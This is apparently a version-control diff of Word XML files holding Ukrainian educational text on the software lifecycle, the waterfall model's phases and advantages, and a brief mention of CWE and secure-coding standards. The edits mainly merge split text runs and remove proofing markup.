+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -6433,7 +6565,40 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної </w:t>
+        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6444,40 +6609,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+        <w:t>для використання в статичному аналізаторі вихідного коду.</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -398,97 +398,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Насправді, більшість дій в ході виконання проекті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> не відбуваються за лінійним законом. Найчастіше розробникам буває необхідно повернутися до попередньої стадії, щоб виконати завдання, які не були в </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>св</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ій час дозволені відповідним чином. Якщо </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> стадії розробки виявляється відсутність або неправильне формулювання вимог, розробник не просувається вперед, а повертається назад - до стадії специфікацій вимог. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>П</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ісля завершення і корекції специфікацій вимог повторно вводиться і починає виконуватися стадія розробки. Щоб відобразити повторюваний характер розробки ПО, в графіку рис. 1.1 було додано зворотні </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>стр</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
+        <w:t>Насправді, більшість дій в ході виконання проектів не відбуваються за лінійним законом. Найчастіше розробникам буває необхідно повернутися до попередньої стадії, щоб виконати завдання, які не були в свій час дозволені відповідним чином. Якщо на стадії розробки виявляється відсутність або неправильне формулювання вимог, розробник не просувається вперед, а повертається назад - до стадії специфікацій вимог. Після завершення і корекції специфікацій вимог повторно вводиться і починає виконуватися стадія розробки. Щоб відобразити повторюваний характер розробки ПО, в графіку рис. 1.1 було додано зворотні стрілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -619,7 +529,6 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -627,17 +536,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Короткий</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> опис фаз каскадної моделі</w:t>
+        <w:t>Короткий опис фаз каскадної моделі</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -655,25 +554,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Наведена нижче характеристика являє собою </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>короткий</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> опис кожної</w:t>
+        <w:t>Наведена нижче характеристика являє собою короткий опис кожної</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -714,23 +595,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>досл</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідження концепції - відбувається дослідження вимог на системному рівні з метою визначення можливості реалізації концепції;</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>дослідження концепції - відбувається дослідження вимог на системному рівні з метою визначення можливості реалізації концепції;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -753,43 +624,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Процес </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>системного</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>арх</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ітектур</w:t>
+        <w:t>Процес системного розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної архітектур</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -829,18 +664,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">процес визначення вимог - визначаються програмні вимозі для інформаційної предметної області системи, призначення, лінії поведінки, продуктивність і інтерфейси. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(В разі необхідності в процес також включено функціональний розподіл системних вимог до апаратному) 'і програмному)' забезпечення.);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>процес визначення вимог - визначаються програмні вимозі для інформаційної предметної області системи, призначення, лінії поведінки, продуктивність і інтерфейси. (В разі необхідності в процес також включено функціональний розподіл системних вимог до апаратному) 'і програмному)' забезпечення.);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -862,25 +687,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">процес розробки проекту - розробляється і формулнруетсі логічно </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Посл</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідовна технічна характеристика програмної системи, включаючи структури даних, архітектуру ПО, інтерфейсні уявлення і процесуальну (алгоритмічну) деталізацію;</w:t>
+        <w:t>процес розробки проекту - розробляється і формулнруетсі логічно Послідовна технічна характеристика програмної системи, включаючи структури даних, архітектуру ПО, інтерфейсні уявлення і процесуальну (алгоритмічну) деталізацію;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -903,25 +710,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">процес реалізації - в результаті його виконання ескізне опис ПО перетворюється в повноцінний програмний продукт. При цьому створюється вихідний код, база даних і документація, які лежать </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> основі фізичного перетворення проекту. Якщо програмний продукт являє собою придбаний пакет прикладних програм, основними діями по його реалізації будуть установка і тестування пакету програм. Якщо програмний продукт розробляється на замов</w:t>
+        <w:t>процес реалізації - в результаті його виконання ескізне опис ПО перетворюється в повноцінний програмний продукт. При цьому створюється вихідний код, база даних і документація, які лежать в основі фізичного перетворення проекту. Якщо програмний продукт являє собою придбаний пакет прикладних програм, основними діями по його реалізації будуть установка і тестування пакету програм. Якщо програмний продукт розробляється на замов</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -960,25 +749,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">процес установки-включає установку ПО, його </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>перев</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ірку і офіційну приймання замовником для операційного середовища;</w:t>
+        <w:t>процес установки-включає установку ПО, його перевірку і офіційну приймання замовником для операційного середовища;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1001,25 +772,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">процес експлуатації та </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідтримки - має на увазі запуск користувачем системи і поточне забезпечення, включаючи надання технічної допомоги, обговорення питань, що виникли з користувачем, реєстрацію запитів</w:t>
+        <w:t>процес експлуатації та підтримки - має на увазі запуск користувачем системи і поточне забезпечення, включаючи надання технічної допомоги, обговорення питань, що виникли з користувачем, реєстрацію запитів</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1058,43 +811,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються процесом </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідтримки. Складається з ітерацій розробки і передбачає зворотний зв'язок по про доставлених і</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>нформац</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ії про аномалії;</w:t>
+        <w:t>процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються процесом підтримки. Складається з ітерацій розробки і передбачає зворотний зв'язок по про доставлених інформації про аномалії;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1135,25 +852,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> існуючої системи з її </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>активного</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> використання або шляхом припинення </w:t>
+        <w:t xml:space="preserve"> існуючої системи з її активного використання або шляхом припинення </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1210,25 +909,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">інтегральні завдання - включають початок роботи над проектом, моніторинг проекту та його управління, управління якістю, верифікацію і атестацію, управління конфігурацією, розробку документації і професійну </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідготовку протягом усього життєвого циклу.</w:t>
+        <w:t>інтегральні завдання - включають початок роботи над проектом, моніторинг проекту та його управління, управління якістю, верифікацію і атестацію, управління конфігурацією, розробку документації і професійну підготовку протягом усього життєвого циклу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1295,25 +976,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">ель має </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>безл</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>іч переваг, якщо її</w:t>
+        <w:t>ель має безліч переваг, якщо її</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1388,25 +1051,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">модель добре відома споживачам. які не мають відношення до розробки та експлуатації програм, і кінцевим користувачам (вона часто використовується іншими організаціями </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>для</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> відстеження проектів, не пов'язаних з розробкою ПЗ);</w:t>
+        <w:t>модель добре відома споживачам. які не мають відношення до розробки та експлуатації програм, і кінцевим користувачам (вона часто використовується іншими організаціями для відстеження проектів, не пов'язаних з розробкою ПЗ);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1454,25 +1099,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> зі складнощами і добре спрацьовує </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>для</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> тих проектів, які досить зрозумілі, але все ж важк</w:t>
+        <w:t xml:space="preserve"> зі складнощами і добре спрацьовує для тих проектів, які досить зрозумілі, але все ж важк</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1546,25 +1173,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона досить доступна дли розумінні, так як переслі</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>дується</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> проста мета - виконати. необхідні дії;</w:t>
+        <w:t>вона досить доступна дли розумінні, так як переслідується проста мета - виконати. необхідні дії;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1610,25 +1219,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">її структурою може керуватися навіть слабо </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ідготовлений в технічному плані або недосвідчений персонал;</w:t>
+        <w:t>її структурою може керуватися навіть слабо підготовлений в технічному плані або недосвідчений персонал;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1651,25 +1242,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона ві</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>др</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ізняється стабільністю требоваінй;</w:t>
+        <w:t>вона відрізняється стабільністю требоваінй;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1715,25 +1288,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Вона </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
